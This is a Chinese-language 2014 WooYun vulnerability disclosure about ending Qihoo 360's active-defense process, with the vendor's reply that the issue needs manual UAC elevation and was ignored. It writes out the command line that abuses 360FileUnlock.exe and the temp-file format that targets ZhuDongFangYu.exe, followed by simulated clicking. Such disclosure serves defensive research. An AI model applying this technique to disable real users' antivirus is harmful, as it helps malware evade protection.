漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-081890
漏洞标题:一种猥琐办法结束360主动防御
相关厂商:奇虎360
漏洞作者: 王And木
提交时间:2014-11-04 21:39
修复时间:2014-12-30 14:44
公开时间:2014-12-30 14:44
漏洞类型:默认配置不当
危害等级:中
自评Rank:5
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-11-04: 细节已通知厂商并且等待厂商处理中
2014-11-06: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-12-31: 细节向核心白帽子及相关领域专家公开
2015-01-10: 细节向普通白帽子公开
2015-01-20: 细节向实习白帽子公开
2014-12-30: 细节向公众公开
简要描述:
发现一个很简单的方法就可以结束掉360的主动防御
详细说明:
主要针对3609.7.0.2001。其中有一个文件360FileUnlock.exe,可以用命令行去调用。于是去拦截命令行。
"C:\Program Files\360\360safe\Utils\360FileUnlock.exe" /queryfilelist="C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\{E2E433A7-3235-4bcb-BCC3-1C41E5A4D728}.tmp"
得到如上数据。然后我们去看一下这个临时数据
[tag]
tag=1
[filelist]
0=C:\Program Files\360\360safe\deepscan\ZhuDongFangYu.exe
[pathlist]
这样可以出现结束的界面了,剩下的可以对其进行模拟点击然后就可以了。
已测试可行。
漏洞证明:
修复方案:
稍微判断下是不是自己的程序就可以把~
版权声明:转载请注明来源 王And木@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-12-30 14:44
厂商回复:
感谢漏洞作者的反馈。昨天接到报告后,我们验证结果是360主动防御能够拦截此攻击方法。之后经过与漏洞作者交流,得悉测试环境为Win7 X64系统并手工提权了UAC,并且没有开启核晶引擎,从而实现了模拟点击攻击。X86系统无此问题。如果开启核晶引擎或没有手工提权UAC,X64系统上也都是无法攻击成功的,因此忽略漏洞。欢迎继续关注和支持360安全,谢谢!
最新状态:
暂无